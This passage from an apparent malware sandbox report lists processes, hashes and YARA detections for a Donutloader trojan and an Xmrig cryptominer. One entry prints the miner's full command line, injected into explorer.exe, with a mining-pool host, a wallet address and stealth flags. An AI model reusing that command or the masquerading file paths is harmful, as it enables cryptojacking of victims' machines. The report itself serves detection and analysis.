Source: 00000010.00000003.2262725045.0000024769431000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000010.00000003.2262725045.0000024769431000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000003.2236720791.0000024769432000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000010.00000003.2236720791.0000024769432000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000003.2242162134.0000024769431000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000010.00000003.2242162134.0000024769431000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000003.2232579749.0000024769436000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000010.00000003.2232579749.0000024769436000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000003.2239521563.000002476943F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000010.00000003.2239521563.000002476943F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000003.2263942655.0000024769433000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000010.00000003.2263942655.0000024769433000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000003.2260012653.0000024769436000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000010.00000003.2260012653.0000024769436000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000003.2231606755.0000024769434000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000010.00000003.2231606755.0000024769434000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000003.2244730823.000002476943C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000010.00000003.2244730823.000002476943C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000003.2266356078.0000024769438000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000010.00000003.2266356078.0000024769438000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000003.2230448544.0000024769438000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000010.00000003.2230448544.0000024769438000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000003.2243392476.000002476943F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000010.00000003.2243392476.000002476943F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000003.2241271993.000002476943F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000010.00000003.2241271993.000002476943F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000003.2256496200.0000024769432000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000010.00000003.2256496200.0000024769432000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000003.2240379880.000002476943D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000010.00000003.2240379880.000002476943D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000003.2220629227.0000024769433000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000010.00000003.2220629227.0000024769433000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Target ID:	17
Start time:	18:17:02
Start date:	07/10/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
Imagebase:	0x400000
File size:	31'744 bytes
MD5 hash:	3C9FA255FE0A761E4D8535039EB86F5C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000011.00000002.2211357524.0000000000825000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 00000011.00000002.2211357524.0000000000825000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	true

Target ID:	18
Start time:	18:17:02
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\conhost.exe" "/sihost64"
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000012.00000002.2234389210.0000025C64110000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 00000012.00000002.2234389210.0000025C64110000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Target ID:	19
Start time:	18:17:04
Start date:	07/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth
Imagebase:	0x7ff609140000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	20
Start time:	18:17:04
Start date:	07/10/2024
Path:	C:\Users\user\AppData\Local\Temp\services64.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\services64.exe"
Imagebase:	0x400000
File size:	2'234'880 bytes
MD5 hash:	DEF89B601B7DDD52A94E15DBD38EAEEF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000014.00000002.2235023601.0000000000A8C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 00000014.00000002.2235023601.0000000000A8C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Target ID:	21
Start time:	18:17:04
Start date:	07/10/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff717f30000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	22
Start time:	18:17:04
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000016.00000002.2255998341.000001D90D160000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 00000016.00000002.2255998341.000001D90D160000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Target ID:	23
Start time:	18:17:06
Start date:	07/10/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
Imagebase:	0x400000
File size:	31'744 bytes
MD5 hash:	3C9FA255FE0A761E4D8535039EB86F5C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000017.00000002.2257559925.0000000000925000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 00000017.00000002.2257559925.0000000000925000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Target ID:	24
Start time:	18:17:06
Start date:	07/10/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
Imagebase:	0x400000
File size:	31'744 bytes
MD5 hash:	3C9FA255FE0A761E4D8535039EB86F5C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000018.00000002.2249781552.0000000000845000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 00000018.00000002.2249781552.0000000000845000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Target ID:	25
Start time:	18:17:06
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\conhost.exe" "/sihost64"
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	26
Start time:	18:17:06
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\conhost.exe" "/sihost64"
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	31
Start time:	18:20:12
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	32
Start time:	18:20:12
Start date:	07/10/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -pss -s 432 -p 6012 -ip 6012
Imagebase:	0x7ff765810000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	33
Start time:	18:20:12
Start date:	07/10/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 6012 -s 880
Imagebase:	0x7ff765810000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	34
Start time:	18:20:14
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false